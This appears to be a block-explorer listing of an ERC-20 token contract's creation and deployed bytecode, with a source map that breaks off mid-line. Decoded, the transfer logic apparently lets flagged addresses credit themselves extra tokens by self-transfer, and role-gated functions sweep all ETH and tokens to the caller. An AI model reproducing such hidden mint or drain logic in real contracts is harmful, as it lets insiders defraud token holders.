5780633950935114620003b65780633f936ff514620003db57806349bd5a5e14620003f357600080fd5b80632f2ff15d14620003135780632f48ab7d1462000338578063313ce567146200037357600080fd5b806318160ddd11620001b657806318160ddd14620002725780631c6a0c4c146200029357806323b872dd14620002ba578063248a9ca314620002df57600080fd5b806301ffc9a714620001ec57806306fdde031462000226578063095ea7b3146200024d57600080fd5b36620001e757005b600080fd5b348015620001f957600080fd5b50620002116200020b366004620017bd565b62000600565b60405190151581526020015b60405180910390f35b3480156200023357600080fd5b506200023e62000638565b6040516200021d91906200180f565b3480156200025a57600080fd5b50620002116200026c3660046200185a565b620006d2565b3480156200027f57600080fd5b506003545b6040519081526020016200021d565b348015620002a057600080fd5b50620002b8620002b236600462001889565b620006ec565b005b348015620002c757600080fd5b5062000211620002d9366004620018a3565b6200074b565b348015620002ec57600080fd5b5062000284620002fe36600462001889565b60009081526007602052604090206001015490565b3480156200032057600080fd5b50620002b862000332366004620018e9565b62000773565b3480156200034557600080fd5b50600a546200035a906001600160a01b031681565b6040516001600160a01b0390911681526020016200021d565b3480156200038057600080fd5b50604051600981526020016200021d565b3480156200039e57600080fd5b50620002b8620003b0366004620018e9565b6200079c565b348015620003c357600080fd5b5062000211620003d53660046200185a565b62000822565b348015620003e857600080fd5b5062000284600d5481565b3480156200040057600080fd5b506009546200035a906001600160a01b031681565b3480156200042257600080fd5b50620002b8620004343660046200191c565b6200084a565b3480156200044757600080fd5b5062000284620004593660046200194f565b6001600160a01b031660009081526020819052604090205490565b3480156200048157600080fd5b50620002b862000ac1565b3480156200049957600080fd5b50600f546200035a906001600160a01b031681565b348015620004bb57600080fd5b506006546001600160a01b03166200035a565b348015620004db57600080fd5b5062000211620004ed366004620018e9565b62000ad9565b3480156200050057600080fd5b506200023e62000b04565b3480156200051857600080fd5b5062000284600081565b3480156200052f57600080fd5b5062000211620005413660046200185a565b62000b15565b3480156200055457600080fd5b5062000211620005663660046200185a565b62000b96565b3480156200057957600080fd5b50620002b86200058b366004620018e9565b62000ba6565b3480156200059e57600080fd5b50620002b8620005b03660046200194f565b62000bcf565b348015620005c357600080fd5b5062000284620005d53660046200191c565b62000ce2565b348015620005e857600080fd5b50620002b8620005fa3660046200194f565b62000d0d565b60006001600160e01b03198216637965db0b60e01b14806200063257506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606004805462000649906200196f565b80601f016020809104026020016040519081016040528092919081815260200182805462000677906200196f565b8015620006c85780601f106200069c57610100808354040283529160200191620006c8565b820191906000526020600020905b815481529060010190602001808311620006aa57829003601f168201915b5050505050905090565b600033620006e281858562000d8c565b5060019392505050565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b08620007188162000eb4565b604051339083156108fc029084906000818181858888f1935050505015801562000746573d6000803e3d6000fd5b505050565b6000336200075b85828562000ec0565b6200076885858562000f41565b506001949350505050565b600082815260076020526040902060010154620007908162000eb4565b62000746838362001056565b6001600160a01b0381163314620008125760405162461bcd60e51b815260206004820152602f60248201527f416363657373436f6e74726f6c3a2063616e206f6e6c792072656e6f756e636560448201526e103937b632b9903337b91039b2b63360891b60648201526084015b60405180910390fd5b6200081e8282620010e0565b5050565b600033620006e281858562000838838362000ce2565b620008449190620019c1565b62000d8c565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b08620008768162000eb4565b600a80546001600160a01b038086166001600160a01b0319928316179092556008805492851692909116821790556040805163c45a015560e01b8152905184929163c45a01559160048083019260209291908290030181865afa158015620008e2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620009089190620019d7565b600a546040516364e329cb60e11b81523060048201526001600160a01b03918216602482015291169063c9c65396906044016020604051808303816000875af11580156200095a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620009809190620019d7565b600980546001600160a01b0319166001600160a01b03928316179055600a5460085460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015620009eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000a119190620019f7565b5060085462000a2e9030906001600160a01b031660001962000d8c565b62000a3d303060001962000d8c565b600b5460085462000a5e916001600160a01b03908116911660001962000d8c565b3060405162000a6d90620017af565b6001600160a01b039091168152602001604051809103906000f08015801562000a9a573d6000803e3d6000fd5b50600f80546001600160a01b0319166001600160a01b039290921691909117905550505050565b62000acb6200114a565b62000ad76000620011a6565b565b60009182526007602090815260408084206001600160a01b0393909316845291905290205460ff1690565b60606005805462000649906200196f565b6000338162000b25828662000ce2565b90508381101562000b875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840162000809565b62000768828686840362000d8c565b600033620006e281858562000f41565b60008281526007602052604090206001015462000bc38162000eb4565b620007468383620010e0565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b0862000bfb8162000eb4565b6040516370a0823160e01b81523060048201526001600160a01b0383169063a9059cbb90339083906370a0823190602401602060405180830381865afa15801562000c4a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c70919062001a1b565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801562000cbc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620007469190620019f7565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b62000d176200114a565b6001600160a01b03811662000d7e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840162000809565b62000d8981620011a6565b50565b6001600160a01b03831662000df05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840162000809565b6001600160a01b03821662000e535760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840162000809565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b62000d898133620011f8565b600062000ece848462000ce2565b9050600019811462000f3b578181101562000f2c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640162000809565b62000f3b848484840362000d8c565b50505050565b6000811162000f865760405162461bcd60e51b815260206004820152601060248201526f0616d6f756e74206d75737420677420360841b604482015260640162000809565b6009546001600160a01b0384811691161480159062000fb357506009546001600160a01b03838116911614155b1562000fc6576200074683838362001049565b6009546001600160a01b039081169084160362000fea57620007468383836200125c565b6009546001600160a01b039081169083160362000746576001600160a01b0383166000908152600e602052604090205460ff16156200103057620007468383836200125c565b600c54620010499082906001600160a01b0316620014a8565b620007468383836200125c565b62001062828262000ad9565b6200081e5760008281526007602090815260408083206001600160a01b03851684529091529020805460ff191660011790556200109c3390565b6001600160a01b0316816001600160a01b0316837f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a45050565b620010ec828262000ad9565b156200081e5760008281526007602090815260408083206001600160a01b0385168085529252808320805460ff1916905551339285917ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b9190a45050565b6006546001600160a01b0316331462000ad75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000809565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b62001204828262000ad9565b6200081e576200121481620015db565b62001221836020620015ee565b6040516020016200123492919062001a35565b60408051601f198184030181529082905262461bcd60e51b825262000809916004016200180f565b6001600160a01b038316620012c25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840162000809565b6001600160a01b038216620013265760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840162000809565b6001600160a01b03831660009081526020819052604090205481811015620013a05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840162000809565b6001600160a01b0380851660008181526020818152604080832087870390559387168252838220805487019055918152600290915220548490849060ff16806200140257506001600160a01b03811660009081526002602052604090205460ff165b156200145257806001600160a01b0316826001600160a01b03160362001452576001600160a01b038216600090815260208190526040812080548692906200144c908490620019c1565b90915550505b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516200149891815260200190565b60405180910390a3505050505050565b600f805460ff60a01b1916600160a01b1790553060009081526020818152604080832054815160028082526060820184529194939092908301908036833701905050905083821015620014f9578193505b8315620015c857308160008151811062001517576200151762001ac4565b6001600160a01b039283166020918202929092010152600a548251911690829060019081106200154b576200154b62001ac4565b6001600160a01b039283166020918202929092010152600854604051635c11d79560e01b8152911690635c11d795906200159390879060009086908990429060040162001ada565b600060405180830381600087803b158015620015ae57600080fd5b505af1158015620015c3573d6000803e3d6000fd5b505050505b5050600f805460ff60a01b191690555050565b6060620006326001600160a01b03831660145b60606000620015ff83600262001b4d565b6200160c906002620019c1565b67ffffffffffffffff81111562001627576200162762001aae565b6040519080825280601f01601f19166020018201604052801562001652576020820181803683370190505b509050600360fc1b8160008151811062001670576200167062001ac4565b60200101906001600160f81b031916908160001a905350600f60fb1b81600181518110620016a257620016a262001ac4565b60200101906001600160f81b031916908160001a9053506000620016c884600262001b4d565b620016d5906001620019c1565b90505b600181111562001757576f181899199a1a9b1b9c1cb0b131b232b360811b85600f16601081106200170d576200170d62001ac4565b1a60f81b82828151811062001726576200172662001ac4565b60200101906001600160f81b031916908160001a90535060049490941c936200174f8162001b67565b9050620016d8565b508315620017a85760405162461bcd60e51b815260206004820181905260248201527f537472696e67733a20686578206c656e67746820696e73756666696369656e74604482015260640162000809565b9392505050565b6101478062001b8283390190565b600060208284031215620017d057600080fd5b81356001600160e01b031981168114620017a857600080fd5b60005b8381101562001806578181015183820152602001620017ec565b50506000910152565b602081526000825180602084015262001830816040850160208701620017e9565b601f01601f19169190910160400192915050565b6001600160a01b038116811462000d8957600080fd5b600080604083850312156200186e57600080fd5b82356200187b8162001844565b946020939093013593505050565b6000602082840312156200189c57600080fd5b5035919050565b600080600060608486031215620018b957600080fd5b8335620018c68162001844565b92506020840135620018d88162001844565b929592945050506040919091013590565b60008060408385031215620018fd57600080fd5b823591506020830135620019118162001844565b809150509250929050565b600080604083850312156200193057600080fd5b82356200193d8162001844565b91506020830135620019118162001844565b6000602082840312156200196257600080fd5b8135620017a88162001844565b600181811c908216806200198457607f821691505b602082108103620019a557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115620006325762000632620019ab565b600060208284031215620019ea57600080fd5b8151620017a88162001844565b60006020828403121562001a0a57600080fd5b81518015158114620017a857600080fd5b60006020828403121562001a2e57600080fd5b5051919050565b7f416363657373436f6e74726f6c3a206163636f756e742000000000000000000081526000835162001a6f816017850160208801620017e9565b7001034b99036b4b9b9b4b733903937b6329607d1b601791840191820152835162001aa2816028840160208801620017e9565b01602801949350505050565b634e487b7160e01b600052604160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101562001b2c5784516001600160a01b03168352938301939183019160010162001b05565b50506001600160a01b03969096166060850152505050608001529392505050565b8082028115828204841417620006325762000632620019ab565b60008162001b795762001b79620019ab565b50600019019056fe608060405234801561001057600080fd5b5060405161014738038061014783398101604081905261002f916100a8565b60405163095ea7b360e01b815233600482015260001960248201526001600160a01b0382169063095ea7b3906044016020604051808303816000875af115801561007d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100a191906100d8565b50506100fa565b6000602082840312156100ba57600080fd5b81516001600160a01b03811681146100d157600080fd5b9392505050565b6000602082840312156100ea57600080fd5b815180151581146100d157600080fd5b603f806101086000396000f3fe6080604052600080fdfea264697066735822122096986eee559a44db58ddb5f687b9dae301291fa3392659c5323375e98b1f2d8864736f6c63430008110033a2646970667358221220603a2fb3ba545649a5d51cd12973b6651bc1f791d5f41cd83a813679aaf2e9a964736f6c63430008110033241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b08

Deployed Bytecode

0x608060405260043610620001df5760003560e01c80636f6579a311620000ff578063a217fddf1162000095578063d547741f116200006c578063d547741f146200056c578063d99274481462000591578063dd62ed3e14620005b6578063f2fde38b14620005db57600080fd5b8063a217fddf146200050b578063a457c2d71462000522578063a9059cbb146200054757600080fd5b80638718b24f11620000d65780638718b24f146200048c5780638da5cb5b14620004ae57806391d1485414620004ce57806395d89b4114620004f357600080fd5b80636f6579a3146200041557806370a08231146200043a578063715018a6146200047457600080fd5b80632f2ff15d116200017557806336568abe116200014c57806336568abe14620003915780633950935114620003b65780633f936ff514620003db57806349bd5a5e14620003f357600080fd5b80632f2ff15d14620003135780632f48ab7d1462000338578063313ce567146200037357600080fd5b806318160ddd11620001b657806318160ddd14620002725780631c6a0c4c146200029357806323b872dd14620002ba578063248a9ca314620002df57600080fd5b806301ffc9a714620001ec57806306fdde031462000226578063095ea7b3146200024d57600080fd5b36620001e757005b600080fd5b348015620001f957600080fd5b50620002116200020b366004620017bd565b62000600565b60405190151581526020015b60405180910390f35b3480156200023357600080fd5b506200023e62000638565b6040516200021d91906200180f565b3480156200025a57600080fd5b50620002116200026c3660046200185a565b620006d2565b3480156200027f57600080fd5b506003545b6040519081526020016200021d565b348015620002a057600080fd5b50620002b8620002b236600462001889565b620006ec565b005b348015620002c757600080fd5b5062000211620002d9366004620018a3565b6200074b565b348015620002ec57600080fd5b5062000284620002fe36600462001889565b60009081526007602052604090206001015490565b3480156200032057600080fd5b50620002b862000332366004620018e9565b62000773565b3480156200034557600080fd5b50600a546200035a906001600160a01b031681565b6040516001600160a01b0390911681526020016200021d565b3480156200038057600080fd5b50604051600981526020016200021d565b3480156200039e57600080fd5b50620002b8620003b0366004620018e9565b6200079c565b348015620003c357600080fd5b5062000211620003d53660046200185a565b62000822565b348015620003e857600080fd5b5062000284600d5481565b3480156200040057600080fd5b506009546200035a906001600160a01b031681565b3480156200042257600080fd5b50620002b8620004343660046200191c565b6200084a565b3480156200044757600080fd5b5062000284620004593660046200194f565b6001600160a01b031660009081526020819052604090205490565b3480156200048157600080fd5b50620002b862000ac1565b3480156200049957600080fd5b50600f546200035a906001600160a01b031681565b348015620004bb57600080fd5b506006546001600160a01b03166200035a565b348015620004db57600080fd5b5062000211620004ed366004620018e9565b62000ad9565b3480156200050057600080fd5b506200023e62000b04565b3480156200051857600080fd5b5062000284600081565b3480156200052f57600080fd5b5062000211620005413660046200185a565b62000b15565b3480156200055457600080fd5b5062000211620005663660046200185a565b62000b96565b3480156200057957600080fd5b50620002b86200058b366004620018e9565b62000ba6565b3480156200059e57600080fd5b50620002b8620005b03660046200194f565b62000bcf565b348015620005c357600080fd5b5062000284620005d53660046200191c565b62000ce2565b348015620005e857600080fd5b50620002b8620005fa3660046200194f565b62000d0d565b60006001600160e01b03198216637965db0b60e01b14806200063257506301ffc9a760e01b6001600160e01b03198316145b92915050565b60606004805462000649906200196f565b80601f016020809104026020016040519081016040528092919081815260200182805462000677906200196f565b8015620006c85780601f106200069c57610100808354040283529160200191620006c8565b820191906000526020600020905b815481529060010190602001808311620006aa57829003601f168201915b5050505050905090565b600033620006e281858562000d8c565b5060019392505050565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b08620007188162000eb4565b604051339083156108fc029084906000818181858888f1935050505015801562000746573d6000803e3d6000fd5b505050565b6000336200075b85828562000ec0565b6200076885858562000f41565b506001949350505050565b600082815260076020526040902060010154620007908162000eb4565b62000746838362001056565b6001600160a01b0381163314620008125760405162461bcd60e51b815260206004820152602f60248201527f416363657373436f6e74726f6c3a2063616e206f6e6c792072656e6f756e636560448201526e103937b632b9903337b91039b2b63360891b60648201526084015b60405180910390fd5b6200081e8282620010e0565b5050565b600033620006e281858562000838838362000ce2565b620008449190620019c1565b62000d8c565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b08620008768162000eb4565b600a80546001600160a01b038086166001600160a01b0319928316179092556008805492851692909116821790556040805163c45a015560e01b8152905184929163c45a01559160048083019260209291908290030181865afa158015620008e2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620009089190620019d7565b600a546040516364e329cb60e11b81523060048201526001600160a01b03918216602482015291169063c9c65396906044016020604051808303816000875af11580156200095a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620009809190620019d7565b600980546001600160a01b0319166001600160a01b03928316179055600a5460085460405163095ea7b360e01b81529083166004820152600019602482015291169063095ea7b3906044016020604051808303816000875af1158015620009eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000a119190620019f7565b5060085462000a2e9030906001600160a01b031660001962000d8c565b62000a3d303060001962000d8c565b600b5460085462000a5e916001600160a01b03908116911660001962000d8c565b3060405162000a6d90620017af565b6001600160a01b039091168152602001604051809103906000f08015801562000a9a573d6000803e3d6000fd5b50600f80546001600160a01b0319166001600160a01b039290921691909117905550505050565b62000acb6200114a565b62000ad76000620011a6565b565b60009182526007602090815260408084206001600160a01b0393909316845291905290205460ff1690565b60606005805462000649906200196f565b6000338162000b25828662000ce2565b90508381101562000b875760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840162000809565b62000768828686840362000d8c565b600033620006e281858562000f41565b60008281526007602052604090206001015462000bc38162000eb4565b620007468383620010e0565b7f241ecf16d79d0f8dbfb92cbc07fe17840425976cf0667f022fe9877caa831b0862000bfb8162000eb4565b6040516370a0823160e01b81523060048201526001600160a01b0383169063a9059cbb90339083906370a0823190602401602060405180830381865afa15801562000c4a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000c70919062001a1b565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af115801562000cbc573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620007469190620019f7565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b62000d176200114a565b6001600160a01b03811662000d7e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840162000809565b62000d8981620011a6565b50565b6001600160a01b03831662000df05760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840162000809565b6001600160a01b03821662000e535760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840162000809565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b62000d898133620011f8565b600062000ece848462000ce2565b9050600019811462000f3b578181101562000f2c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640162000809565b62000f3b848484840362000d8c565b50505050565b6000811162000f865760405162461bcd60e51b815260206004820152601060248201526f0616d6f756e74206d75737420677420360841b604482015260640162000809565b6009546001600160a01b0384811691161480159062000fb357506009546001600160a01b03838116911614155b1562000fc6576200074683838362001049565b6009546001600160a01b039081169084160362000fea57620007468383836200125c565b6009546001600160a01b039081169083160362000746576001600160a01b0383166000908152600e602052604090205460ff16156200103057620007468383836200125c565b600c54620010499082906001600160a01b0316620014a8565b620007468383836200125c565b62001062828262000ad9565b6200081e5760008281526007602090815260408083206001600160a01b03851684529091529020805460ff191660011790556200109c3390565b6001600160a01b0316816001600160a01b0316837f2f8788117e7eff1d82e926ec794901d17c78024a50270940304540a733656f0d60405160405180910390a45050565b620010ec828262000ad9565b156200081e5760008281526007602090815260408083206001600160a01b0385168085529252808320805460ff1916905551339285917ff6391f5c32d9c69d2a47ea670b442974b53935d1edc7fd64eb21e047a839171b9190a45050565b6006546001600160a01b0316331462000ad75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000809565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b62001204828262000ad9565b6200081e576200121481620015db565b62001221836020620015ee565b6040516020016200123492919062001a35565b60408051601f198184030181529082905262461bcd60e51b825262000809916004016200180f565b6001600160a01b038316620012c25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840162000809565b6001600160a01b038216620013265760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840162000809565b6001600160a01b03831660009081526020819052604090205481811015620013a05760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840162000809565b6001600160a01b0380851660008181526020818152604080832087870390559387168252838220805487019055918152600290915220548490849060ff16806200140257506001600160a01b03811660009081526002602052604090205460ff165b156200145257806001600160a01b0316826001600160a01b03160362001452576001600160a01b038216600090815260208190526040812080548692906200144c908490620019c1565b90915550505b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516200149891815260200190565b60405180910390a3505050505050565b600f805460ff60a01b1916600160a01b1790553060009081526020818152604080832054815160028082526060820184529194939092908301908036833701905050905083821015620014f9578193505b8315620015c857308160008151811062001517576200151762001ac4565b6001600160a01b039283166020918202929092010152600a548251911690829060019081106200154b576200154b62001ac4565b6001600160a01b039283166020918202929092010152600854604051635c11d79560e01b8152911690635c11d795906200159390879060009086908990429060040162001ada565b600060405180830381600087803b158015620015ae57600080fd5b505af1158015620015c3573d6000803e3d6000fd5b505050505b5050600f805460ff60a01b191690555050565b6060620006326001600160a01b03831660145b60606000620015ff83600262001b4d565b6200160c906002620019c1565b67ffffffffffffffff81111562001627576200162762001aae565b6040519080825280601f01601f19166020018201604052801562001652576020820181803683370190505b509050600360fc1b8160008151811062001670576200167062001ac4565b60200101906001600160f81b031916908160001a905350600f60fb1b81600181518110620016a257620016a262001ac4565b60200101906001600160f81b031916908160001a9053506000620016c884600262001b4d565b620016d5906001620019c1565b90505b600181111562001757576f181899199a1a9b1b9c1cb0b131b232b360811b85600f16601081106200170d576200170d62001ac4565b1a60f81b82828151811062001726576200172662001ac4565b60200101906001600160f81b031916908160001a90535060049490941c936200174f8162001b67565b9050620016d8565b508315620017a85760405162461bcd60e51b815260206004820181905260248201527f537472696e67733a20686578206c656e67746820696e73756666696369656e74604482015260640162000809565b9392505050565b6101478062001b8283390190565b600060208284031215620017d057600080fd5b81356001600160e01b031981168114620017a857600080fd5b60005b8381101562001806578181015183820152602001620017ec565b50506000910152565b602081526000825180602084015262001830816040850160208701620017e9565b601f01601f19169190910160400192915050565b6001600160a01b038116811462000d8957600080fd5b600080604083850312156200186e57600080fd5b82356200187b8162001844565b946020939093013593505050565b6000602082840312156200189c57600080fd5b5035919050565b600080600060608486031215620018b957600080fd5b8335620018c68162001844565b92506020840135620018d88162001844565b929592945050506040919091013590565b60008060408385031215620018fd57600080fd5b823591506020830135620019118162001844565b809150509250929050565b600080604083850312156200193057600080fd5b82356200193d8162001844565b91506020830135620019118162001844565b6000602082840312156200196257600080fd5b8135620017a88162001844565b600181811c908216806200198457607f821691505b602082108103620019a557634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b80820180821115620006325762000632620019ab565b600060208284031215620019ea57600080fd5b8151620017a88162001844565b60006020828403121562001a0a57600080fd5b81518015158114620017a857600080fd5b60006020828403121562001a2e57600080fd5b5051919050565b7f416363657373436f6e74726f6c3a206163636f756e742000000000000000000081526000835162001a6f816017850160208801620017e9565b7001034b99036b4b9b9b4b733903937b6329607d1b601791840191820152835162001aa2816028840160208801620017e9565b01602801949350505050565b634e487b7160e01b600052604160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101562001b2c5784516001600160a01b03168352938301939183019160010162001b05565b50506001600160a01b03969096166060850152505050608001529392505050565b8082028115828204841417620006325762000632620019ab565b60008162001b795762001b79620019ab565b50600019019056fe608060405234801561001057600080fd5b5060405161014738038061014783398101604081905261002f916100a8565b60405163095ea7b360e01b815233600482015260001960248201526001600160a01b0382169063095ea7b3906044016020604051808303816000875af115801561007d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906100a191906100d8565b50506100fa565b6000602082840312156100ba57600080fd5b81516001600160a01b03811681146100d157600080fd5b9392505050565b6000602082840312156100ea57600080fd5b815180151581146100d157600080fd5b603f806101086000396000f3fe6080604052600080fdfea264697066735822122096986eee559a44db58ddb5f687b9dae301291fa3392659c5323375e98b1f2d8864736f6c63430008110033a2646970667358221220603a2fb3ba545649a5d51cd12973b6651bc1f791d5f41cd83a813679aaf2e9a964736f6c63430008110033

Deployed Bytecode Sourcemap

63238:5122:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;37640:204;;;;;;;;;;-1:-1:-1;37640:204:0;;;;;:::i;:::-;;:::i;:::-;;;470:14:1;;463:22;445:41;;433:2;418:18;37640:204:0;;;;;;;;51834:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;54194:201::-;;;;;;;;;;-1:-1:-1;54194:201:0;;;;;:::i;:::-;;:::i;52963:108::-;;;;;;;;;;-1:-1:-1;53051:12:0;;52963:108;;;1755:25:1;;;1743:2;1728:18;52963:108:0;1609:177:1;68190:122:0;;;;;;;;;;-1:-1:-1;68190:122:0;;;;;:::i;:::-;;:::i;:::-;;54975:261;;;;;;;;;;-1:-1:-1;54975:261:0;;;;;:::i;:::-;;:::i;39463:131::-;;;;;;;;;;-1:-1:-1;39463:131:0;;;;;:::i;:::-;39537:7;39564:12;;;:6;:12;;;;;:22;;;;39463:131;39904:147;;;;;;;;;;-1:-1:-1;39904:147:0;;;;;:::i;:::-;;:::i;63473:19::-;;;;;;;;;;-1:-1:-1;63473:19:0;;;;-1:-1:-1;;;;;63473:19:0;;;;;;-1:-1:-1;;;;;3288:32:1;;;3270:51;;3258:2;3243:18;63473:19:0;3124:203:1;64972:92:0;;;;;;;;;;-1:-1:-1;64972:92:0;;65055:1;3474:36:1;;3462:2;3447:18;64972:92:0;3332:184:1;41048:218:0;;;;;;;;;;-1:-1:-1;41048:218:0;;;;;:::i;:::-;;:::i;55645:238::-;;;;;;;;;;-1:-1:-1;55645:238:0;;;;;:::i;:::-;;:::i;63542:24::-;;;;;;;;;;;;;;;;63438:28;;;;;;;;;;-1:-1:-1;63438:28:0;;;;-1:-1:-1;;;;;63438:28:0;;;64218:748;;;;;;;;;;-1:-1:-1;64218:748:0;;;;;:::i;:::-;;:::i;53134:127::-;;;;;;;;;;-1:-1:-1;53134:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;53235:18:0;53208:7;53235:18;;;;;;;;;;;;53134:127;45185:103;;;;;;;;;;;;;:::i;63622:41::-;;;;;;;;;;-1:-1:-1;63622:41:0;;;;-1:-1:-1;;;;;63622:41:0;;;44544:87;;;;;;;;;;-1:-1:-1;44617:6:0;;-1:-1:-1;;;;;44617:6:0;44544:87;;37936:147;;;;;;;;;;-1:-1:-1;37936:147:0;;;;;:::i;:::-;;:::i;52053:104::-;;;;;;;;;;;;;:::i;37041:49::-;;;;;;;;;;-1:-1:-1;37041:49:0;37086:4;37041:49;;56386:436;;;;;;;;;;-1:-1:-1;56386:436:0;;;;;:::i;:::-;;:::i;53467:193::-;;;;;;;;;;-1:-1:-1;53467:193:0;;;;;:::i;:::-;;:::i;40344:149::-;;;;;;;;;;-1:-1:-1;40344:149:0;;;;;:::i;:::-;;:::i;68017:161::-;;;;;;;;;;-1:-1:-1;68017:161:0;;;;;:::i;:::-;;:::i;53723:151::-;;;;;;;;;;-1:-1:-1;53723:151:0;;;;;:::i;:::-;;:::i;45443:201::-;;;;;;;;;;-1:-1:-1;45443:201:0;;;;;:::i;:::-;;:::i;37640:204::-;37725:4;-1:-1:-1;;;;;;37749:47:0;;-1:-1:-1;;;37749:47:0;;:87;;-1:-1:-1;;;;;;;;;;6686:40:0;;;37800:36;37742:94;37640:204;-1:-1:-1;;37640:204:0:o;51834:100::-;51888:13;51921:5;51914:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;51834:100;:::o;54194:201::-;54277:4;34802:10;54333:32;34802:10;54349:7;54358:6;54333:8;:32::i;:::-;-1:-1:-1;54383:4:0;;54194:201;-1:-1:-1;;;54194:201:0:o;68190:122::-;63331:25;37532:16;37543:4;37532:10;:16::i;:::-;68268:36:::1;::::0;6827